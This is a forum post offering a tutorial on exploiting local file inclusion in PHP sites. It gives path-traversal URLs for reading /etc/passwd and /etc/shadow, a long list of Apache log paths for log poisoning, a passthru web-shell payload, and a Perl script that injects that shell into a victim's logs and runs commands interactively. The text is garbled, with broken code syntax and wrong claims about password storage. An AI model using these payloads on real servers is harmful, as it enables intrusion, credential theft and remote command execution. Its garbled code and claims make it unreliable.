Jump to content
Aerosol

LFI vulnerability exploitation

By Aerosol, in Securitate web

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted

In this tutorial you'll learn how how to exploit a vulnerable LFI site.

First of all let's have a look at this small PHP code:

PHP Code : 

 < ? php
$ page = $ _GET [page ] ;
include ( $ page ) ;
? >

This is a code should not be never used again, because is vulnerable to LFI, the $page variable is not sanitized.

We take advantage of this vulnerability with this code :

 site.host / index.php page = . . / . . / . . / . . / . . / . . / . . / etc / passwd

If the site is hosted Unix users passwords are stored in / etc / passwd and the above code shows the passwords and usernames .

Now all you have to do is to decode the password.

An encrypted password should look like:

 username: x : 503:100 : fullname :/ home / username :/ bin / sh

In this example , the password is x , as another example of the password :

 username ! : 503:100 : fullname :/ home / username :/ bin / sh

Other " places " where you can find passwords out of / etc / passwd it's about :

 / etc / shadow
/ etc / group
/ etc / security / group
/ etc / security / passwd
/ etc / security / user
/ etc / security / environ
/ etc / security / limits

In case the browser will show a late inclusion . Php ( and automatically. / Etc / passwd.php not exist ) , add to sf including server will skip all write .

 site.host / index.php ? file = . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd

We try to run the commands in the log server injecting php code, then coiling them .

Some addresses log :

 . . / apache / logs / error.log
. . / apache / logs / access.log
. . / . . / apache / logs / error.log
. . / . . / apache / logs / access.log
. . / . . / . . / apache / logs / error.log
. . / . . / . . / apache / logs / access.log
. . / . . / . . / . . / . . / . . / . . / etc / httpd / logs / acces_log
. . / . . / . . / . . / . . / . . / . . / etc / httpd / logs / acces.log
. . / . . / . . / . . / . . / . . / . . / etc / httpd / logs / error_log
. . / . . / . . / . . / . . / . . / . . / etc / httpd / logs / error.log
. . / . . / . . / . . / . . / . . / . . / var / www / logs / access_log
. . / . . / . . / . . / . . / . . / . . / var / www / logs / access.log
. . / . . / . . / . . / . . / . . / . . / usr / local / apache / logs / access_log
. . / . . / . . / . . / . . / . . / . . / usr / local / apache / logs / access.log
. . / . . / . . / . . / . . / . . / . . / var / log / apache / access_log
../../../../../../../var/log/apache2/access_log
. . / . . / . . / . . / . . / . . / . . / var / log / apache / access.log
../../../../../../../var/log/apache2/access.log
. . / . . / . . / . . / . . / . . / . . / var / log / access_log
. . / . . / . . / . . / . . / . . / . . / var / log / access.log
. . / . . / . . / . . / . . / . . / . . / var / www / logs / error_log
. . / . . / . . / . . / . . / . . / . . / var / www / logs / error.log
. . / . . / . . / . . / . . / . . / . . / usr / local / apache / logs / error_log
. . / . . / . . / . . / . . / . . / . . / usr / local / apache / logs / error.log
. . / . . / . . / . . / . . / . . / . . / var / log / apache / error_log
../../../../../../../var/log/apache2/error_log
. . / . . / . . / . . / . . / . . / . . / var / log / apache / error.log
../../../../../../../var/log/apache2/error.log
. . / . . / . . / . . / . . / . . / . . / var / log / error_log
. . / . . / . . / . . / . . / . . / . . / var / log / error.log 

 site.host / index.php ? file = . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd

Ok , now let 's look at the log that saves pages that do not exist and the following code : < ? passthru ( \ $ _GET [ cmd ] ) ? > . If we write in the browser:

site.host / < ? passthru ( \ $ _GET [ cmd ] ) ? >

We'll obviously show a page that says that this code does not exist on the server, because the browser automatically encode the URL and the page that we have reached a browser translates to:

 site.host / < ? passthru ( \ $ _GET [ cmd ] ) ? >

So you have to do something else ... We use the following perl script :

 #! / usr / bin / perl -w
use IO :: Socket ;
use LWP :: UserAgent ;
$ site = " victim.com "
$ path = " / folder / " ;
$ code = "<? passthru ( \ $ _GET [ cmd ] ) ? > " ;
$ log = " . . / . . / . . / . . / . . / . . / . . / etc / httpd / logs / error_log " ;

print " Trying to inject the code" ;

$ socket = IO :: Socket :: INET - > new ( Proto = > " tcp " , PeerAddr = > " $ site " PeerPort = > "80" ) or die "\ nConnection Failed . \ n \ n";
print $ socket " GET " . $ path . $ code . " HTTP/1.1 \ r \ n";
print $ socket "User -Agent " . $ code . "\ r \ n";
print $ socket "Host : " . $ site . "\ r \ n";
print $ socket "Connection : close \ r \ n \ r \ n";
close ( $ socket) ;
print " \ nCode $ code sucssefully injected in $ log \ n";

print " \ nType command to run or exit to end: " ;
$ cmd = <STDIN> ;

while ($ cmd ! ~ "exit" ) {

$ socket = IO :: Socket :: INET - > new ( Proto = > " tcp " , PeerAddr = > " $ site " PeerPort = > "80" ) or die "\ nConnection Failed . \ n \ n";
****print $ socket " GET " . $ path . " index.php = ' . $ log . " & cmd = $ cmd HTTP/1.1 \ r \ n ";
****print $ socket "Host : " . $ site . "\ r \ n";
****print $ socket " Accept: * / * \ r \ n";
****print $ socket "Connection : close \ r \ n \ n";

****while ($ show = <$ socket > )
****{
********print $ show ;
****}

print " Type command to run or exit to end: " ;
$ cmd = <STDIN> ;
}

Source: madleets

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...